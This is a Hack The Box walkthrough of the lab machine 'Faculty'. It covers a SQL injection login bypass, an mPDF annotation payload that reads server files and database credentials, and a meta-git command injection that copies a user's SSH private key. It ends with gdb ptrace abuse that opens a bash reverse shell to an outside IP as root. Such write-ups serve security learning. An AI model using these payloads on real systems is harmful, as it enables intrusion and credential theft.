Faculty — Hackthebox walkthrough

Foothold

Nmap reveals 2open ports

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e9:41:8c:e5:54:4d:6f:14:98:76:16:e7:29:2d:02:16 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzpbkoBfa0UKxT+Giw4wE1jz82gGRpuANEdRt+D6gp6hDmrcaODUiU/N+4nX08jcFBk103cLwU8VisxyRu3wHMTHXaYx2WMZXPtb8clv3Hrt+q2m4eL+DBJMkHO10qCx1IwfYcNyJA3CNCj88X8RgWIREalYWyNHeQFzAHZx4SSrCP9aW5QKqAYVAAS4Za0pts4HVYlfuOrxFgO/Z3FL3xynYeyLrFM+iEx0cMl9rIYWG8NzqVnBe180u+7d/y/kcsZU6MkBMmqWQlGA6o4srVx73AqbUDChkv8glvq0ZbD1JYmACuMCdn/GFI8lRlKaw1BaYeuP0l6qgbb65ghdECYEXC3iycPkR77D6gMbIbg4F9wvzD9AF//aCR+6t8F29DyP/mh1J8a+yiUHY2HJJaDvB5vQLg5Y++9yNEDmxlGFQTdJm/n7YhP2Qj+lkfgsERAO9pfIWGCCWaXl6fddUG4gp1bHLZkek+exgsimU7hApGFrJCtYPkf78xC3pvxx0=
|   256 43:75:10:3e:cb:78:e9:52:0e:eb:cf:7f:fd:f6:6d:3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH8WAd+YlbEo4Fpz3+UaOYyCJGFa/E29JORgMAIOXVlGUpvMgQqiaqDMXtbt/G03rGEI9h8dpFAmswN1LJ8uig=
|   256 c1:1c:af:76:2b:56:e8:b3:b8:8a:e9:69:73:7b:e6:f5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINSCwKublVScg9d/3Tc/NAh0n9XH5lE9SBfl2dl+v6F+
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://faculty.htb
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Going to port 80, we are redirected to http://faculty.htb so we add this to our /etc/hosts file and continue.

After, visiting http://faculty.htb we are presented with a form to put in an ID.

Since I ddin’t know a specific ID, I tired to bypass this with SQLi. Trying ' or 1=1 -- - in this field, I was able to bypass the ID verification and login as Smith, John C

Then I started to fuzz the webroot for hidden directories.

feroxbuster -u http://faculty.htb -w /usr/share/wordlists/dirb/small.txt

And I saw there was a directory called admin Visiting there, I was presented with a menu which I was able to choose from. I was able to download the different courses and the faculties that was available.

Once I downloaded the PDF file, I used exiftool to look at the meta data.

exiftool file.pdf

I saw mPDF is used to make the pdf file.

mPDF is a module that is used to convert html content to pdf. Looking for different issues, in this module, I found one which allowed me to read files as an attachment from the server through HTML injection.

Make annotation tags disabled by default · Issue #356 · mpdf/mpdf

If we intercept the request that is sent to the download.php when we click on the PDF icon, we can see that a heap of base64 encoded data is sent. We can use cyberchef to decode it to plain text.

That way, we understand that the contents of the fields are encoded in a pattern

url_encode->url_encode->base64

So to decode it, we have to use these layers in the reverse order.

base64->url_decode->url_decode

Now that we know this, we can try to send the payload from the issue we found to test for a possible LFI.

<annotation file="/etc/passwd" content="/etc/passwd"  icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

We encode this payload and send it along.

Once that’s done, we are presented to download a PDF file like usual. Looking at the attachments, we see a file called passwd

We can download it and verify that we indeed have LFI.

Now that LFI, is confirmed, we can look at the files of the PHP application we saw. Since this is an opensource application we can look at what files could be there worth looking into.

So I downloaded the application and went looking around. Then I found an interesting file which was admin/db_connect.php

So I tried to include that file. We can find the place where the web app is located on the server using a request with an invalid parameter (id_no ->id_no_1)to the ID verification field we saw earlier.

Since, the full path of the file should be /var/www/scheduling/admin/db_connect.php Including this using, we get the credentials to login as the gbyolo user using ssh

<annotation file="/var/www/scheduling/admin/db_connect.php" content="/var/www/scheduling/admin/db_connect.php"  icon="Graph" 
title="Attached File: /var/www/scheduling/admin/db_connect.php" pos-x="195"  />

JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL3Zhci93d3cvc2NoZWR1bGluZy9hZG1pbi9kYl9jb25uZWN0LnBocCUyNTIyJTI1MjBjb250ZW50PSUyNTIyL3Zhci93d3cvc2NoZWR1bGluZy9hZG1pbi9kYl9jb25uZWN0LnBocCUyNTIyJTI1MjAlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjAlMjUwQXRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjAvdmFyL3d3dy9zY2hlZHVsaW5nL2FkbWluL2RiX2Nvbm5lY3QucGhwJTI1MjIlMjUyMHBvcy14PSUyNTIyMTk1JTI1MjIlMjUyMCUyNTIwLyUyNTNF

User

Doing sudo -l as gbyolo user, I saw I can run /usr/local/bin/meta-git as developer user.

Googling around, I found a command injection vulnerability for this utility.

Node.js third-party modules disclosed on HackerOne: [meta-git] RCE...

Using this I was able to grab the ssh key of the developer user.

sudo -u developer /usr/local/bin/meta-git clone 'sss||cat /home/developer/.ssh/id_rsa > /tmp/kavi'

Using this I logged in as the developer user.

Root

Running linpeas as developer I saw cap_sys_ptrace+ep capability was set to gdb

With a quick google search I was able to find a way to exploit this.

Linux Capabilities

First I had to find a process running by root which had the system function in it’s context. (system is useful to execute commands)

ps aux|grep root

Among these, I found python3 was running by root.

This was perfect for this job, as this has system function in it’s context. You can verify that by using objdump

objdump -D /usr/bin/python3|grep system

I noted down the PID of the process which was 719

Then all I had to so was to attach to that process and call system which would give me command execution as root.

gdb -p 719
call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.14.95/9090 0>&1'")

Then I got a root shell on my listener.

Rooted!